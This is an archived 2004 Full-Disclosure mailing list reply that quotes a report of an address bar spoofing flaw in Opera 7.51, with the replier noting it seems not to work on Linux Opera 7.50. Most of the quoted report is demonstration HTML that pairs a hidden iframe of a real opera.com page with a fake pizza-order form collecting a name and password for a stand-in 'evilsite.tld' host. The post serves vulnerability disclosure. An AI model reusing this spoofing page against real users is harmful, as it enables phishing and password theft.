lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20040618222448.34a0d575@janmobil>
From: jan_kantert at web.de (Jan Kantert)
Subject: Opera Browser version 7.51 Address Bar
 Spoofing Vulnerability

Hi!

Seems if It does not work in Opera 7.50 on Linux.

Jan

Am Fri, 18 Jun 2004 12:39:22 +0000
schrieb "winter bitlance" <bitlance_3@...mail.com>:

> Hi List.
> 
> A vulnerability is found in the Opera browser version 7.51 , which can be 
> exploited by spammers to spoof information displayed in the address 
> bar.Tested on Windows OS.
> 
> Demonstration HTML source code:
> 
> ======== begin ========
> [!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"]
> [html lang="en"]
> [head]
> [meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"]
> [meta http-equiv="Content-Script-Type" content="text/javascript"]
> [meta http-equiv="Content-Style-Type" content="text/css"]
> [meta http-equiv="REFRESH"
>   content="0;url=javascript:(function(){})();"]
> [title]Opera 7.51 Address Bar Spoofing Vulnerability[/title]
> [script type="text/javascript"]
> [!-- hide JavaScript from old browsers
> var dummy="Do not remove this script element.";
> // end hiding JavaScript --]
> [/script]
> [style type="text/css"]
> [!-- /* hide iframe element. */
>   iframe {
>          display: none !important;
>          }
> /* hide iframe element. */ --]
> [!-- /* pizza form */
>   body {
>          margin-left: 2em;
>          margin-right: 2em;
>          font-family:verdana;
>          font-size:80%;
>        }
>   h1 { font-size:120%;}
>   h2 { font-size:100%;}
>   table { font-size:85%; background-color:buttonface; }
>   table caption {
>     background-color:activecaption; color:captiontext;
>     font-weight:bold; text-align:left; }
>   table table { font-size:100%; }
>   table input { font-family:verdana; font-size:100%; }
>   table select { font-family:verdana; font-size:100%; }
> /* pizza form */ --]
> [/style]
> [/head]
> [body]
> [h1]Opera Browser version 7.51 Address Bar Spoofing Vulnerability[/h1]
> [h2]Tested on Windows OS[/h2]
> [p][a href="http://www.opera.com/" title="Opera 7.51, Everything You Need 
> Online"]
> Opera 7.51[/a], Everything You Need Online
> [/p]
> [iframe title="inline frame spoofing address bar"
> src="https://pizza.opera.com/order.html"]
> This inline frame is hidden. See CSS.
> [/iframe]
> [!-- below, phishing form order pizza --]
> [h2]Welcome to Pizza Opera dot Com[/h2]
> [form name="frmPizza" action="phishing://evilsite.tld"]
> [table id="tblPizzaForm" cellspacing="0" cellpadding="3"]
> [caption]Order Your Pizza[/caption]
> [tr valign="top"]
>   [td][label for="txtName" accesskey="M"]Na[u]m[/u]e: [/label][/td]
>   [td][input type="text" name="txtName" id="txtName"][/td]
> [/tr]
> [tr valign="top"]
>   [td][label for="txtPassword" accesskey="P"][u]P[/u]assword: [/label][/td]
>   [td][input type="password" name="txtPassword" id="txtPassword"][/td]
> [/tr]
> [tr valign="top"]
>   [td][label for="selSize" accesskey="S"][u]S[/u]ize: [/label][/td]
>   [td]
>     [select name="selSize" id="selSize"]
>     [option value="0"]--- pick a size --- [/option]
>     [option value="1"]Small[/option]
>     [option value="2"]Medium[/option]
>     [option value="3"]Large[/option]
>     [/select]
>   [/td]
> [/tr]
> [tr valign="top"]
>   [td colspan="2"]
>     [fieldset id="fstCrust"]
>     [legend]Crust[/legend]
>     [table cellpadding="1" cellspacing="0"]
>     [tr]
>       [td][input type="radio" name="radCrust" id="radCrust_Thick" 
> value="Thick"][/td]
>       [td][label for="radCrust_Thick" 
> accesskey="K"]Thic[u]k[/u][/label][/td]
>       [td][input type="radio" name="radCrust" id="radCrust_Thin" 
> value="Thin"][/td]
>       [td][label for="radCrust_Thin" accesskey="N"]Thi[u]n[/u][/label][/td]
>     [/tr]
>     [/table]
>     [/fieldset]
>   [/td]
> [/tr]
> [tr valign="top"]
>   [td colspan="2"]
>     [fieldset id="fstToppings"]
>     [legend]Toppings[/legend]
>     [table cellpadding="1" cellspacing="0"]
>     [tr]
>       [td][input type="checkbox" name="chkHam" id="chkHam" value="Ham"][/td]
>       [td][label for="chkHam" accesskey="H"][u]H[/u]am[/label][/td]
>     [/tr]
>     [tr]
>       [td][input type="checkbox" name="chkPineapple" id="chkPineapple" 
> value="Pineapple"][/td]
>       [td][label for="chkPineapple" 
> accesskey="I"]P[u]i[/u]neapple[/label][/td]
>     [/tr]
>     [tr]
>       [td][input type="checkbox" name="chkExtraCheese" id="chkExtraCheese" 
> value="Extra Cheese"][/td]
>       [td][label for="chkExtraCheese" accesskey="E"][u]E[/u]xtra 
> Cheese[/label][/td]
>     [/tr]
>     [/table]
>     [/fieldset]
>   [/td]
> [/tr]
> [tr valign="top"]
>   [td colspan="2" align="right"][input type="submit" value="   Order!   
> "][/td]
> [/tr]
> [/table]
> [/form]
> [/body]
> [/html]
> ========= end =========
> (Sorry,too long code.)
> 
> Thank you, List.
> 
> --
> bitlance winter
> 
> P.S.
> I tender my acknowledgment to my godparent who has named 'bitlance'.
> 
> _________________________________________________________________
> Watch the online reality show Mixed Messages with a friend and enter to win 
> a trip to NY 
> http://www.msnmessenger-download.click-url.com/go/onm00200497ave/direct/01/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


-- 
Stopt Softwarepatente, sonst wird Softwareentwicklung in Europa f?r die 
meisten illegal!
Infos: http://webshop.ffii.org

320.000 Stimmen, 2000 Firmen gegen Logikpatente     http://noepatents.org/
Innovation statt Patentinflation                    http://swpat.ffii.org/

Bitte senden Sie mir keine Word- oder PowerPoint-Anh?nge.
Siehe http://www.fsf.org/philosophy/no-word-attachments.de.html

Alle Rechtscheibfehler in dieser Mail sind urheberrechtlich gesch?tzt.
F?r Grammatikfehler wird keine Haftung ?bernommen.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040618/3edd2c0c/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ